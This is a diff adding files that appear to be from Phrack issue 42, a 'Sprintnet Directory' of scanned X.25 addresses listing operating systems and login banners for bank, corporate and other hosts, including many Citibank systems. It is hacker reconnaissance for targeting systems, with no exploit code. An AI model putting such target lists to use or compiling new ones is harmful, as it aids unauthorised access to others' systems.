+211 15140              NEODATA SERVICES NETWORK
+ 
+ 
+ 
+ 
+212  -  New York  Scanned: [0 - 3000] & various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+212 30                 ENTER ID:
+212 31   $ VM/CMS             
+212 34   *             
+212 40                 PLEASE ENTER /LOGIN
+212 41                 MHP201A UPK05173  APPLICATION: 
+212 48   *             
+212 52   $ Prime
+212 53     VAX/VMS             
+212 73   $ Prime            
+212 79                 ENTER ID:
+212 100    VAX/VMS     Username:
+212 101    VAX/VMS     Username: 
+212 102                **** Invalid sign-on, please try again **** 
+212 103    VAX/VMS     Username: 
+212 104                **** Invalid sign-on, please try again ****
+212 105                **** Invalid sign-on, please try again ****
+212 106                **** Invalid sign-on, please try again ****
+212 108                **** Invalid sign-on, please try again ****
+212 109                **** Invalid sign-on, please try again ****
+212 110                **** Invalid sign-on, please try again ****
+212 112                Shearson Lehman Brothers
+212 124  $ VAX/VMS     Username:       
+212 130                you are now connected to the host computer 
+212 131                Shearson Lehman Brothers
+212 137    Prime       PRIMENET 22.1.1.R17.STS.6 NY60  
+212 145                ENTER ACCESS ID: 
+212 146                ENTER ACCESS ID: 
+212 152    VAX/VMS     Username: 
+212 170  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK
+212 172  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK  
+212 174  $             TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK  
+212 197                BANKERS TRUST 
+212 202    VAX/VMS     Username:
+212 226                USER ID   ?
+212 231  $ VM/CMS            
+212 242                ENTER IDENTIFICATION: 
+212 255    VAX/VMS     (PB2 - PBS Development System)
+212 259    VAX/VMS     (NYTASD - TAS SYSTEM) 
+212 260                Bankers Trust Online 
+212 274  $             INVALID INPUT      
+212 275                Bankers Trust Online
+212 276  *             
+212 277                ****POSSIBLE DATA LOSS 00 00****
+212 278                Bankers Trust Online
+212 279                User:          (RSTS V9.3-20) 
+212 285                Invalid login attempt
+212 306  *             
+212 315  $             outdial (212)            
+212 320                ENTER IDENTIFICATION:
+212 321                ENTER IDENTIFICATION: 
+212 322  $             COMMAND UNRECOGNIZED             
+212 336  *
+212 344  *             
+212 345    Prime       PRIMENET 23.2.0.R32 NMSG  
+212 352  *             
+212 359                (drops connection right away)
+212 376 -> 201 950     Bankers Trust Online
+212 430 -> 312 59      Id Please:     User Id:     Password:
+212 432  *             
+212 437  *             
+212 438  *             
+212 440  *             
+212 444    Prime       PRIMENET 21.0.7.R31 EMCO  
+212 446  $ VAX/VMS            
+212 449  $ VM/CMS             
+212 500                enter a for astra 
+212 501                enter a for astra
+212 502                enter a for astra 
+212 503                enter a for astra 
+212 504                enter a for astra 
+212 505                enter a for astra
+212 509  $             Transamerican Leasing (White Plains Data Center)      
+212 539                (drops connections right away)
+212 546  $             APLICACAO:
+212 549  $             BT-Tymnet Gateway
+212 561    VAX/VMS     Username:
+212 571                You are not authorized to connect to this machine.
+212 572  $             No access to this DTE.
+212 580                enter a for astra 
+212 603                Shearson Lehman Brothers
+212 615                Shearson Lehman Brothers
+212 623                Shearson Lehman Brothers
+212 693  $             USER ID   
+212 703    Unix        
+212 704    Unix
+212 713    Prime       PRIMENET 22.1.1.R17.STS.6 NY60  
+212 726  $ VAX/VMS
+212 731 
+212 970  *
+212 971  *
+212 972  *
+212 973  *
+212 974  *
+212 975  *
+212 976  *
+212 977  *
+212 978  *
+212 979  *
+212 1000 $             Enter ID:
+212 1001 $             Enter ID:
+212 1002 $             Enter ID:
+212 1004 $             Enter ID:
+212 1009 $             outdial (212)
+212 1045 $ HP-3000     White & Case - HP 3000 Computer System 
+212 1046 *
+212 1049               APPLICATION: 
+212 1050               NSP READY?
+212 1052   Prime       PRIMENET 20.2.4.R11 FTC0  
+212 1053   VAX/VMS     
+212 1065 $ AOS         Track Data System 12 
+212 1069               #
+212 1071 $ GS/1        CS/100T>
+212 1072 $ GS/1        CS/100T>
+212 1076               NSP READY
+212 1233 *
+212 1355 *
+212 1356 *
+212 1367               You are not authorized to connect to this machine.
+212 1373               enter a for astra 
+212 1450               RadioSuisse Services. 
+212 1469
+212 1477               n042ppp> enter system id
+212 1478               n042ppp> enter system id
+212 2050B  Unix        softdollar login: 
+212 2050D  Unix        softdollar login: 
+212 2060 $             T.S.S.G
+212 2061 $             Boston Safe Deposit and Trust Company
+212 2062 $             TWX40 LOGGED INTO AN INFORMATION SERVICES NETWORK   
+212 2071   VM/CMS      GSERV
+212 2079   VM/CMS      GSERV
+212 2130 $             (echo)
+212 2131 $             (echo)
+212 2134 $             (echo)
+212 2135 $             (echo)
+212 2230 $             (echo)
+212 2231 $             (echo)
+212 2234 $             (echo)
+212 2235 $             (echo)
+212 2245 $             Finlay Fine Jewelry Corp.
+212 2250   VAX/VMS     Username: 
+212 2251               **** Invalid sign-on, please try again ****
+212 2252               **** Invalid sign-on, please try again ****
+212 2253               **** Invalid sign-on, please try again ****
+212 2254               **** Invalid sign-on, please try again ****
+212 2270               **** Invalid sign-on, please try again ****
+212 2271               **** Invalid sign-on, please try again ****
+212 2272               **** Invalid sign-on, please try again ****
+212 2273               **** Invalid sign-on, please try again ****
+212 2274               **** Invalid sign-on, please try again ****
+212 60002              You are not authorized to connect to this machine.
+212 60007              You are not authorized to connect to this machine.
+212 60010              You are not authorized to connect to this machine.
+212 60031  VM/CMS
+212 60032              ENTER ID:
+212 60033  Prime       CDA Online Services 
+212 60034              CHANNEL 03/009. ENTER RESOURCE 
+212 60037  VAX/VMS     MuniView
+212 60044 *
+212 60051 *
+212 60055              USER ID
+ 
+ 
+ 
+ 
+213  -  California  Scanned: [0 - 2000]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+213 21     Prime       PRIMENET 23.2.0.R32 C6    
+213 22     Prime       PRIMENET 23.2.0.R32 D6    
+213 23   $             outdial (213)
+213 24                 Marketron Research and Sales System
+213 25   $             outdial (213)
+213 35                 Marketron Research and Sales System
+213 41   $             (echo)
+213 45   $             ENTER NETWORK SIGN-ON:
+213 50   $             (echo)
+213 52   $ Prime
+213 53                 CONNECTED TO PACKET/74
+213 55                 CONNECTED TO PACKET/74
+213 56                 CONNECTED TO PACKET/74
+213 60                 CONNECTED TO PACKET/74
+213 61                 CONNECTED TO PACKET/74
+213 68   *
+213 70   *
+213 102    Prime       PRIMENET 21.0.7.R10 TRWE.A
+213 103  $             outdial (213)
+213 105    Prime       PRIMENET 22.1.3.beta1 SWOP  
+213 121    Prime       PRIMENET 23.0.0 SWWE1 
+213 122    Unix        Computervision Los Angeles District Admin System 
+213 123    Prime       PRIMENET 23.3.0.r29 SWWA1 
+213 129    Prime       PRIMENET 22.0.3vA CALMA1
+213 151    Prime       PRIMENET 22.1.3 CSSWR1
+213 154    Prime       PRIMENET 22.1.1.R27 SWWCR 
+213 155    Prime       PRIMENET 22.1.3 CS.LA 
+213 199    Prime       PRIMENET 23.2.0.R32 C6    
+213 220A               TELENET ASYNC TO 3270 SERVICE 
+213 221A               TELENET ASYNC TO 3270 SERVICE 
+213 248  *
+213 249  *
+213 262  *
+213 265  *
+213 340    Prime       PRIMENET 23.2.0 TRNGW 
+213 336  *
+213 337  $ HP-3000
+213 351    Unix/SunOS  SunOS Release 4.1.2 (X25) 
+213 357    Unix/SunOS  SunOS Release 4.1.1 (X25) 
+213 359    Unix
+213 371  *
+213 373    HP-3000     SAGAN.HP.COM
+213 412  $             outdial (213)
+213 413  $             outdial (213)
+213 540  *
+213 541  *
+213 542  *
+213 543  *
+213 660 
+213 1052 $             Environment Control Monitor
+213 1053 $ Unix        milpitas login: 
+213 1054 *
+213 1055 $             Environment Control Monitor
+213 1056 *
+213 1057 $             Denver Service System (ECM)
+213 1064 *
+213 1065   HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
+213 1073
+213 1079 *
+213 1160 *
+213 1418 *
+213 1419 *
+213 1420 *
+213 1421 *
+213 1422 *
+213 1423 *
+213 1424 *
+213 1425 *
+213 1426 *
+213 1427 *
+213 1428 *
+213 1429 *
+213 1430 *
+213 1450               MACNET:
+ 
+ 
+ 
+ 
+214  -  Texas  Scanned: [0 - 2000]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+214 20                 SIM3278
+214 21                 SIM3278
+214 22   $             outdial (214)
+214 42     VAX/VMS     Username:
+214 60     HP-3000     DELTA.RCO.NTI
+214 68   $ VAX/VMS     GTECVC
+214 76     Cyber       Power Computing Cyber Service
+214 231
+214 240
+214 245  *
+214 337 
+214 352                IST451I ENTER VALID COMMAND - NETX B0A8VD00
+214 355  *
+214 358  *
+214 364  $ VAX/VMS     GTECVC 
+214 366                Renex Connect, Enter service code -    
+214 371    Prime       PRIMENET 21.0.2S GCAD..
+214 372
+214 373  *
+214 1031 *
+214 1032 *
+214 1033 *
+214 1034 $             (echo)
+214 1035 *
+214 1040 $             (echo)
+214 1048               Renex Connect, Enter terminal type or "M" for menu 
+214 1070               BT-Tymnet Gateway  please log in: information
+214 1071   Cyber       You may enter CDCNET commands.
+214 1075   Cyber       You may enter CDCNET commands.
+214 1131 *
+214 1151   VAX/VMS     Username:
+214 1152 *
+214 1153
+214 1158 *
+214 1161   VAX/VMS     Username:
+214 1230 *
+214 1237
+214 1238 
+214 1241 *
+214 1242 *
+214 1243 *
+214 1244 *
+214 1245 *
+214 1246 *
+214 1247 *
+214 1248 *
+214 1249 *
+214 1250 *
+214 1251 *
+214 1252 *
+214 1253 *
+214 1254 *
+214 1255 *
+214 1256 *
+214 1257 *
+214 1258 *
+214 1260 *
+214 1261 *
+214 1262 *
+214 1263 *
+214 1264 *
+214 1265   VAX/VMS     Username:
+214 1277 *
+214 1278 *
+214 1334 *
+214 1335 *
+214 1336 *
+214 1337 *
+214 1338 *
+214 1339 *
+214 1340 *
+214 1341 *
+214 1343 *
+214 1358 *
+214 1359 *
+214 1362   VAX/VMS     Username:
+214 1363 *
+214 1364 *
+214 1365 *
+214 1366 *
+ 
+ 
+ 
+ 
+215  -  Pennsylvania  Scanned: 0 - 300     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+215 5    $             outdial (215)
+215 22   $             outdial (215)
+215 30   *
+215 38   *
+215 40                 VU/TEXT 
+215 44   *
+215 55   *
+215 60   *
+215 66     Prime       NewsNet
+215 112  $             outdial (215)
+215 121    VM/CMS      TOWERS PERRIN ONLINE--PHILA 
+215 134  *
+215 135                VU/TEXT 
+215 139  *
+215 140                VU/TEXT 
+215 143  *
+215 154 
+215 163    Unix
+215 164    Unix
+215 165    Unix
+215 166    Unix
+215 167    Unix
+215 168    Unix
+215 169    Unix
+215 170    Unix
+215 171    Unix
+215 172  *
+215 173  *
+215 176  *
+215 179    Unix        PLASPEC Engineering & Marketing Network
+215 231 
+215 251    Unix
+215 252    Unix
+215 253    Unix
+215 254    Unix
+215 255    Unix
+215 261    VAX/VMS     File Transfer and Gateway Service Node ARGO
+215 262 
+215 263
+215 263 
+215 264                %@CVTTAUD@dUYECVGUIiED
+215 270                CONNECTED TO PACKET/400
+215 530  $
+215 531  $
+215 532  $
+215 533  $
+215 534  $
+215 535  $
+215 536  $
+215 537  $
+215 538  $
+215 539  $
+215 540  $
+215 541  $
+ 
+ 
+ 
+ 
+216  -  Ohio  Scanned: [0 - 2000]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+216 20   $             outdial (216)
+216 21   $             outdial (216)
+216 38     VAX/VMS     Username:
+216 49 
+216 51   *
+216 59   *             
+216 60                 APPLICATION: 
+216 63   *
+216 64     Prime       PRIMENET 20.2.4 LIPC  
+216 74   $ hp-x000
+216 75   *
+216 120  $             outdial (216)
+216 134  *
+216 135  *
+216 140 
+216 201  $ HP-3000
+216 202  *
+216 203  *
+216 204  *
+216 205  *
+216 209  *
+216 210  *
+216 211  *
+216 212  $ HP-3000
+216 530  *
+216 531  *
+216 532  *
+216 533  *
+216 534  *
+216 535  *
+216 536  *
+216 537  *
+216 538  *
+216 539  $             (echo)
+216 1351   Prime       PRIMENET 22.1.4 OPSPRO
+216 1352   Prime       Good morning
+216 1353   Prime       PRIMENET 22.1.4 OPSPRO
+216 1354   Prime       Good morning
+216 1355 $ Prime       PRIMENET 22.1.4.R63 OPSSEC
+216 1356 *
+216 1357   Prime       Good morning
+216 1358   Prime       PRIMENET 22.1.4 OPSPRO
+216 1369 *
+216 1370 *
+216 1371 *
+216 1372 *
+ 
+ 
+ 
+217  -  Illinois  Scanned: 0 - 200      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+217 45   *
+217 46   *
+ 
+ 
+ 
+ 
+219  -  Indiana  Scanned: 0 - 200    
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+219 3      Prime       PRIMENET 22.1.0vA2 NODE.0
+219 8      Prime       PRIMENET 23.2.0vA NODE.8
+219 9                  ENTER GROUP NAME> 
+219 10                 Lincoln National Corporation
+219 35   $             MHP201A ZMA0PZ10  * VERSION 6.0.1 *.
+219 140    Prime       PRIMENET 23.2.0vA CS.FTW
+219 150  *
+ 
+ 
+ 
+222  -  unknown  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+222 100    Prime
+222 140    Prime
+222 320    Prime
+222 340 
+ 
+ 
+ 
+ 
+223  -  Citibank  Scanned: various      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+223 1    $ GS/1        CITITRUST/WIN Gateway!  (Toll 25 cents)
+223 6                  PLEASE ENTER TRANSACTION ID:
+223 10     Prime
+223 11     Prime
+223 13     Prime
+223 15     Prime
+223 17                 CDS DATA PROCESSING SUPPORT
+223 19   $ HP-3000
+223 26                 NETWORK USER VALIDATION.
+223 31
+223 32                 enter a for astra 
+223 34                 NETWORK USER VALIDATION.
+223 35     VAX/VMS     TREASURY PRODUCTS
+223 39     Major BBS   GALACTICOMM   User-ID? new
+223 40                 Global Report from Citicorp
+223 41     VOS         (other systems connect from there) 
+223 42                 CITICORP/CITIBANK - 0005,PORT 3
+223 46   $             Enter Secure Access ID -02-> 
+223 47                 CCMS
+223 48A                CITIBANK ,PORT 5
+223 50     Prime
+223 54                 CITI CASH MANAGEMENT NETWORK - 
+223 55                 NETWORK USER VALIDATION. 
+223 57   
+223 65     VOS
+223 68   $             Citimail II
+223 70                 ELECTRONIC CHECK MANAGER  ENTER 'ECM'
+223 71                            "" 
+223 74A                           ""
+223 79     VAX/VMS     Audit login ---  Your session will be recorded. 
+223 87     VOS         CitiShare Milwaukee, Wisconsin
+223 91     VAX/VMS     Unauthorized Use Is Prohibited
+223 92                 <<please enter logon>> 
+223 93     Major BBS?  Citibank Customer Delivery Systems (#95298116)
+223 94                 <<ENTER PASSWORD>>
+223 95
+223 96                 <<ENTER PASSWORD>>
+223 103                <<ENTER PASSWORD>>
+223 104  $ VAX/VMS
+223 106 
+223 175                enter a for astra 
+223 176    VAX/VMS
+223 178                NETWORK USER VALIDATION.
+223 179  $
+223 183    Prime
+223 184    Prime       PRIMENET 23.2.0vB PROD-C
+223 185                Citibank Hongkong
+223 186                Citibank Hongking
+223 187  $ DECserver
+223 188    GS/1        CITITRUST/WIN Gateway!  (Toll 25 cents) 
+223 189  $ DECserver
+223 191                (need x.citipc terminal emulator)
+223 193    Prime
+223 194    VAX/VMS
+223 199  $
+223 200                NETWORK USER VALIDATION.
+223 201                C/C/M INT'L 3    ENTER YOUR ID : [      ]
+223 202                C/C/M INT'L 4    ENTER YOUR ID : [      ]
+223 204                C/C/M INT'L 6    ENTER YOUR ID : [      ]
+223 208                C/C/M            ENTER YOUR ID : [      ]
+223 210                NETWORK USER VALIDATION.
+223 211                CITI Master Policy Bulletin Board
+223 212                            ""
+223 216    VAX/VMS     *** Unauthorized Access Prohibited ***
+223 217 
+223 218 
+223 222    Unix SysV   Citibank PDC Registration System 
+223 223                CITIBANK SINGAPORE 
+223 223    Unix        discovery login: 
+223 227    Prime       PRIMENET 23.2.0.R43 BASCOS
+223 234    VCP-1000    Terminal Server
+223 256    VOS         CITIBANK - NSO      NEW YORK, NY
+223 258    VOS         CITIBANK - NSO      NEW YORK, NY
+223 259    VOS         CITIBANK - NSO      NEW YORK, NY
+223 260    VAX/VMS     Unauthorized Use Is Prohibited
+223 503    ???         :
+223 508 
+223 510    VOS         Citibank Puerto Rico
+223 512    VAX/VMS     #6 Node: NYF050
+223 513                CITI CASH MANAGEMENT NETWORK - 
+223 515    Prime       PRIMENET 23.2.0.R43 BASCOS
+223 519    Prime       PRIMENET 23.2.0.R43 OBSPOM
+223 520  $             CitiMail II
+223 521  $ Major BBS   User-ID?                                 new
+223 523    Prime       PRIMENET 23.2.0.R43 LATPRI
+223 524  $ GS/1        Cititrust (Cayman)'s WIN Gateway!
+223 527                INVALID COMMAND SYNTAX
+223 600 
+223 1000               CITI CASH MANAGEMENT NETWORK 
+223 1002 
+223 3002               NETWORK USER VALIDATION.
+223 3003   ???         Welcome to Citiswitch, New York
+223 3008   ???                      ""
+223 3011   Unix        DG/UX Release 4.32. AViiON  (gnccsvr)
+223 3012   Unix        DG/UX Release 4.32. AViiON  (gnccsvr)
+223 3020   Prime
+223 3030 $ VAX/VMS
+223 3031 *
+223 3042A              CITI Master Policy Bulletin Board
+223 3044 
+223 3046 
+223 3048 $ DECserver
+223 3052   Unix        DG/UX Release 4.32. AViiON  (parsvr)
+223 3056 *
+223 3060B  TBBS        Citicorp Futures Corp.               
+223 3064 $
+223 3066 
+223 3067               NETWORK USER VALIDATION.
+223 3070 *
+223 3074               NETWORK USER VALIDATION.
+223 3075A  Port Selec  Systems: EQX/SUP,SECURID,TS,TS1,TS2,TS3,PBX
+223 3077 
+223 3080A              PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK.
+223 3082 
+223 3083               ENQUIRE       GSM User ID? 
+223 3086   VOS         Citishare
+223 3088   HP-3000     SYSTEMC.HP.CITIBANK
+223 4700 *
+223 8050               ILLEGAL SOURCE ADDRESS 0B 80
+223 8052
+223 8053               TYPE .
+223 8056               ILLEGAL SOURCE ADDRESS 0B 80
+223 8057 *
+223 8058               ILLEGAL SOURCE ADDRESS 0B 80
+223 8059               ILLEGAL SOURCE ADDRESS 0B 80
+223 8100   Prime       PRIMENET 23.1.0 LATRG1
+223 8101   Prime       PRIMENET 23.1.0 LATRG2
+223 8201
+223 8202               Enter password: 
+223 8602   Prime       PRIMENET 23.2.0.R43 OBSPOM
+223 8804               11 - FORMAT ERROR
+223 10009              I/P LOGIN CODE
+223 10010              I/P LOGIN CODE
+223 10015              I/P LOGIN CODE
+223 10030              UMP 15, TP (DEV A)  >
+223 10032              UMP 2,  XGATE (NODE 6)
+223 10050              I/P LOGIN CODE
+ 
+
diff --git a/phrack42/9.txt b/phrack42/9.txt
new file mode 100644
index 0000000..d9b0902
--- /dev/null
+++ b/phrack42/9.txt
@@ -0,0 +1,1422 @@
+                           ==Phrack Magazine==
+
+               Volume Four, Issue Forty-Two, File 9 of 14
+
+                       <Sprintnet Directory Part 2>
+
+
+224  -  Citibank  Scanneds: various
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+224 1                  CITIBANK
+224 2      VAX/VMS     Global Report 
+224 4      Prime       PRIMENET 23.2.0vB PROD-A
+224 5      DECserver
+224 6                  CITIBANK CANADA-CB1
+224 10                 CITIBANK BRASIL 
+224 11                 C/C/M 
+224 12     Prime       PRIMENET 23.2.0vA OZPROD
+224 14                 C/C/M 
+224 16                 CITIBANK FRANKFURT
+224 17     DECserver 
+224 20     DECserver
+224 21
+224 22
+224 23                 CITIBANK N.A. BAHRAIN -  BOOK  SYSTEM
+224 24                 NETWORK USER VALIDATION.
+224 26                 
+224 27                 CITIBANK JOHANNESBURG
+224 30                 CITIBANK PIRAEUS
+224 31                 ADAM_COSMOS 
+224 32                 CITIBANK LONDON 
+224 33                 CITIBANK PARIS 
+224 34                 CITIBANK LONDON 
+224 35                 DUBLIN_COSMOS  
+224 36                 CITIBANK ATG - TEST8.2
+224 37
+224 38                 CITIBANK LEWISHAM 
+224 39                 CITIBANK MILAN 
+224 40
+224 41                 CITICORP/CITIBANK 
+224 42                 CITICORP/CITIBANK 
+224 43                 VIENNA_COSMOS  
+224 44                 CITIBANK LONDON 
+224 45                 NORDIC_COSMOS  
+224 46                 NORDIC_COSMOS  
+224 47                 Enter Secure Access ID -02-> 
+224 48     Prime       CONNECTED TO 03 35-50 
+224 49                 CITIBANK FRANKFURT
+224 50                 CITICORP/CITIBANK 
+224 51                 CITICORP CASH MANAGEMENT SERVICES
+224 53                 JERSEY_COSMOS
+224 55                 SIGN-ON NAO ACEITO 
+224 56     DECserver   
+224 57     VAX/VMS     
+224 61                 CITIBANK SYDNEY 
+224 62                 CITIBANK SINGAPORE 
+224 63                 CITIBANK MANILA 
+224 64     Prime
+224 65                 CITIBANK SINGAPORE
+224 68     DECserver
+224 70                 London Branch Miniswitch
+224 71                 CCM - Citi Cash Manager
+224 73     DECserver   
+224 74                 CITI CASH MANAGEMENT NETWORK 
+224 75                 IBI MIS Systems
+224 76
+224 78                 CITIBANK HONG KONG 
+224 79                 CITIBANK 
+224 80     VAX/VMS     UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
+224 81
+224 82     Prime       PRIMENET 23.2.0vB PROD-C
+224 83     IBM 3708
+224 85
+224 86     Prime       PRIMENET 23.1.0 LATRG1
+227 87     DECserver
+224 89     Prime       PRIMENET 23.1.0 LATRG1
+224 91     Prime
+224 92     VCP-1000    Terminal Server (decserver clone)
+224 93
+224 95                 BMS==>
+224 98                 C/C/M 
+224 100                Cityswitch
+224 104                BMS==>
+224 105
+224 108
+224 110
+224 113    Prime       PRIMENET 23.1.0 LATRG2
+224 122    VAX/VMS?    Global Report from Citicorp
+224 125                PLEASE ENTER TRANSACTION ID:
+224 128    Prime       PRIMENET 23.2.0.R43 LATPRI 
+224 129
+224 130    VAX/VMS     GLOBAL TREASURY PRODUCTS
+224 132    Prime       PRIMENET 23.2.0vB PROD-B
+224 135    VAX/VMS     CMAPD - SRPC Vax Development System
+224 136    VAX/VMS     #6Node: NYF050
+224 137    HP-3000
+224 138
+224 139    VAX/VMS     (restricted access system)
+224 140    VAX/VMS               ""
+224 141                :
+224 142                C/C/M
+224 143                CITI CASH MANAGEMENT NETWORK 
+224 147                C/C/M
+224 148                CITIBANK LONDON 
+224 149                LISBON_COSMOS 
+224 150    DEC         Welcome to the DEC Gateway 
+224 153                CITI CASH MANAGEMENT NETWORK 
+224 155    Prime       PRIMENET 23.2.0vB PROD-B
+224 157    DecServer   
+224 158           
+224 159                CDS DATA PROCESSING SUPPORT
+224 160                (pad?)
+224 161    VAX/VMS
+224 162    Prime
+224 163    Prime
+224 164    Prime       PRIMENET 22.1.2 WINMIS
+224 165    GS/1        LTN>
+224 166    VAX/VMS     GLOBAL TREASURY PRODUCTS 
+224 167    VAX/VMS     GLOBAL TREASURY PRODUCTS
+224 168    VAX/VMS     Global Report from Citicorp
+224 170                ELECTRONIC CHECK MANAGER  ENTER 'ECM' 
+224 172                CitiMail II - Asia Pacific 
+224 174                PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK
+224 175                Enter T or V for TSO or M for VM/CMS.
+224 176    DECserver   
+224 177    VAX/VMS     Unauthorized Use Is Prohibited
+224 179                <<please enter logon>> 
+224 180                Citibank N.A. PUERTO RICO
+224 193                :
+224 194    VOS         CitiShare Milwaukee, Wisconsin
+224 195                Citimail II 
+224 196    Xyplex      X.25 Terminal Server   
+224 197    VAX/VMS 
+224 199
+224 200    EMULEX      TCP/LAT-Compatible Terminal Server
+224 204
+224 205    Prime
+224 207                Communications Subsystem For Interconnection
+224 210    VOS         try "list_users"
+224 211    Major-BBS   User-ID:
+224 212                Master Policy Bulletin Board
+224 213                %%%
+224 214                INDIQUE O TIPO DE TERMINAL 
+224 216    VAX/VMS     *** Unauthorized Access Prohibited ***
+224 217    Prime
+224 218    DECserver   
+224 220                CHANNEL 01/049. ENTER CHOICE: 
+224 221                BUDAPEST_COSMOS (user 63) 
+224 222
+224 223                CITIBANK SINGAPORE 
+224 227
+224 230
+224 234    VCP-1000    (decserver clone)
+224 236                CITIBANK LEWISHAM 
+224 237    DECserver
+224 300  $             CitiMail II
+224 320    VAX/VMS
+224 602    VOS         list_users
+224 700  $             CitiMail II (Asia Pacific)
+224 701    Prime       PRIMENET 23.2.0vB DEV-A 
+224 704    Prime       PRIMENET 23.2.0vB PROD-C
+224 3004               Enter destination : node.port or :SFA
+224 3006               Enter destination : node.port or :SFA
+224 3010 
+224 3013               London Branch Miniswitch
+224 3014               CONNECTED TO CITIBANK LONDON
+224 3016               BMS==>
+224 3024               BMS==>
+224 3027               Enter destination : node.port or :SFA
+224 3032               CITIBANK LONDON 
+224 3035   EMULEX      TCP/LAT-Compatible Terminal Server 
+224 3036   EMULEX      TCP/LAT-Compatible Terminal Server 
+224 3037 $             Citimail II - C.M.E.A 
+224 3038 $
+224 3039 $             Citimvs X.25 Gateway
+224 3043   VAX/VMS     UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
+224 3047               Enter destination : node.port or :SFA
+224 3058 *
+224 3059 *
+224 3103               CITIBANK PARIS 
+224 3116               CITICORP/CITIBANK 
+224 3117   VAX/VMS     UNAUTHORIZED ACCESS TO THIS SYSTEM IS PROHIBITED 
+224 312  3 *
+224 3124               CITIBANK MILAN 
+224 3127               CITIBANK MILAN
+224 3128 *
+224 3131               CITIBANK FRANKFURT 
+224 3133               CITIBANK FRANKFURT 
+224 3230
+224 3231
+224 3235               CITICORP/CITIBANK 
+224 3236               CITICORP/CITIBANK 
+224 4022
+224 8006               Welcome to Citiswitch, HK
+224 8008   VAX/VMS     GTN gateway/Regional Billing/PCSA/CMG accpt
+224 8010
+224 8011   Unix        INFOBASE2 login:
+224 8014   Prime
+224 8018 *
+224 8022 *
+224 8023 *
+224 8026
+224 8027
+224 8030
+224 8031
+224 8033
+224 8034
+224 8035
+224 8105               ENTER RESOURCE : 
+224 8106               Global Report from Citicorp
+224 8122               CITIBANK TOKYO 
+224 8210
+224 8211               CITIBANK MANILA 
+224 8410               CITIBANK SYDNEY 
+224 8412               CITIBANK SYDNEY
+224 8414               PLEASE ENTER YOUR ID : -1->
+224 8415   EMULEX      TCP/LAT-Compatible Terminal Server
+224 8416   Prime
+224 8509               CITIBANK HONGKONG 
+224 8620
+224 8621
+224 8622
+224 8623
+224 8624
+224 8625
+224 8626
+224 8627
+224 8629
+224 8720               CITIBANK SINGAPORE 
+224 8722 *
+224 8725 $ COSMOS
+224 8730   DECserver
+224 8731               CITIBANK SINGAPORE
+224 9010   Prime
+224 9011   VAX/VMS     *** Authorized Personnel Only ***
+224 9150               CITIBANK HONGKONG
+ 
+ 
+ 
+ 
+277  -  Apple Computer Inc.  Scanned: various     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+277 125J   VAX/VMS     YODA  *AUTHORIZED USERS ONLY*
+277 127    VAX/VMS     Apple Canada Inc.
+277 128    VAX/VMS     For internal use only. CHATTERBOX
+277 130J   VAX/VMS     YODA  *AUTHORIZED USERS ONLY*
+277 133    ???         Apple Computer, Inc. X.25 PAD to IP/TCP/TELNET 
+ 
+ 
+ 
+ 
+301  -  Maryland  Scanned: [0 - 2000]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+301 20                 MEDLINE
+301 21   *
+301 26     PRIME       DNAMD1 Online
+301 33     VOS         United Communications Computer Services Group
+301 35                 User Access Verification    Username:
+301 37                 MEDLINE
+301 40                 MEDLINE
+301 56                 U#=
+301 46   *
+301 54     VAX/VMS 5.2 
+301 56                 U#=
+301 77   *
+301 78   *
+301 100    VOS         United Communications Computer Services Group
+301 125    VAX/VMS     
+301 140                MEDLINE
+301 150  $ VAX/VMS
+301 165  *
+301 170    VOS         United Communications Computer Services Group
+301 253    Prime       Primecom Network 19.4Q.111 System 35
+301 254    Prime       Primecom Network 19.4Q.111 System 59
+301 307    Prime       ER!
+301 310    Prime       Primecom Network 19.4Q.106 System 51
+301 320    Prime       Primecom Network 19.4Q.111 System 53
+301 330    Prime       Primecom Network 19.4Q.111 System 30
+301 331    Prime       Primecom Network 19.4Q.111 System 31
+301 332    Prime       Primecom Network 19.4Q.111 System 32
+301 333    Prime       Primecom Network 19.4Q.111 System 33
+301 335    Prime       Primecom Network 19.4Q.111 System 35
+301 336    VAX/VMS     Welcome to VMS 4.6                   
+301 341    Prime       Primecom Network 19.4Q.111 System 41
+301 342    Prime       Primecom Network 19.4Q.111 System 42
+301 343    Prime       Primecom Network 19.4Q.111 System 43
+301 344    Prime       Primecom Network 19.4Q.111 System 44
+301 345    Prime       Primecom Network 19.4Q.111 System 45
+301 346    Prime       Primecom Network 19.4Q.111 System 46
